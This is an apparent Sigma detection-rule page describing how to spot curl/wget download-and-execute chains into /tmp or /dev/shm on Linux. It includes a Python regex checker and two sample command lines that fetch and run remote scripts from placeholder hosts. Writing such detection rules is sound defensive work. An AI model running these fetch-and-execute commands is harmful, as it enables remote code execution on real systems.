Suspicious Download and Execute Pattern via Curl/Wget

Sigma Rules

Summary
This rule detects a suspicious pattern in the use of command-line download tools such as `curl` and `wget` on Linux systems. It looks for cases where these tools fetch scripts or executables into temporary directories such as `/tmp` or `/dev/shm` and the downloaded content is then executed immediately through a shell wrapper (`sh -c`). This download-and-execute sequence is characteristic of fileless or multi-stage attack techniques in which an attacker runs unauthorized code while avoiding traditional file-based detection. Because these tools are legitimate and widely used, the rule keys on the combination of a download, a temporary-directory destination and an immediate execution in quick succession, a combination commonly associated with malware, stagers and other attack chains that abuse scripting capabilities on Linux. The rule raises an alert when this command pattern appears in process creation logs so that security teams can investigate and distinguish authorized activity from a potential threat.
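As an added illustration, not part of the rule page or the Sigma project, the following Python check applies the pattern described above to constructed process-creation records. The field names `Image` and `CommandLine`, the sample command lines and the `example.invalid` hosts are all assumptions made for the example.

```python
import re
from typing import Dict, Iterable, List

# Constructed process-creation records (not from any real host); the field
# names mirror a generic process_creation log source.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": "/usr/bin/sh",
     "CommandLine": 'sh -c "curl -s http://dl.example.invalid/a.sh -o /tmp/a.sh && sh /tmp/a.sh"'},
    {"Image": "/usr/bin/sh",
     "CommandLine": 'sh -c "wget -q -O /dev/shm/.x http://dl.example.invalid/x; chmod +x /dev/shm/.x; /dev/shm/.x"'},
    # Benign: download to a home directory, no shell wrapper, no execution step.
    {"Image": "/usr/bin/curl",
     "CommandLine": "curl -fsSL https://deb.example.invalid/key.gpg -o /home/ops/key.gpg"},
    # Benign: download into /tmp, but nothing is executed afterwards.
    {"Image": "/usr/bin/sh",
     "CommandLine": 'sh -c "wget -O /tmp/report.csv https://intranet.example.invalid/report.csv"'},
]

DOWNLOADER = re.compile(r"\b(curl|wget)\b")
TMP_DIR = re.compile(r"""(^|[\s="'])/(tmp|dev/shm)/""")
SHELL_WRAPPER = re.compile(r"\b(sh|bash|dash)\s+-c\b")
# A command chained after the download (; && | ||) that runs a shell, marks a
# file executable, or invokes something directly from the temporary directory.
CHAINED_EXEC = re.compile(r"(;|&&|\|\|?)\s*((sh|bash)\b|chmod\s+\+x|/(tmp|dev/shm)/\S+)")


def is_download_execute(cmdline: str) -> bool:
    """True when a single command line downloads into /tmp or /dev/shm via a
    shell wrapper and chains an execution step directly after the download."""
    return (DOWNLOADER.search(cmdline) is not None
            and TMP_DIR.search(cmdline) is not None
            and SHELL_WRAPPER.search(cmdline) is not None
            and CHAINED_EXEC.search(cmdline) is not None)


def scan(events: Iterable[Dict[str, str]]) -> List[str]:
    """Return the command lines of all events matching the pattern."""
    return [e["CommandLine"] for e in events
            if is_download_execute(e.get("CommandLine", ""))]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print("ALERT download-and-execute:", hit)
```

Only the first two sample records are flagged; the two benign downloads lack the chained execution step and fall through.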
Categories
  • Linux
  • Endpoint
Data Sources
  • Process
Created: 2025-06-17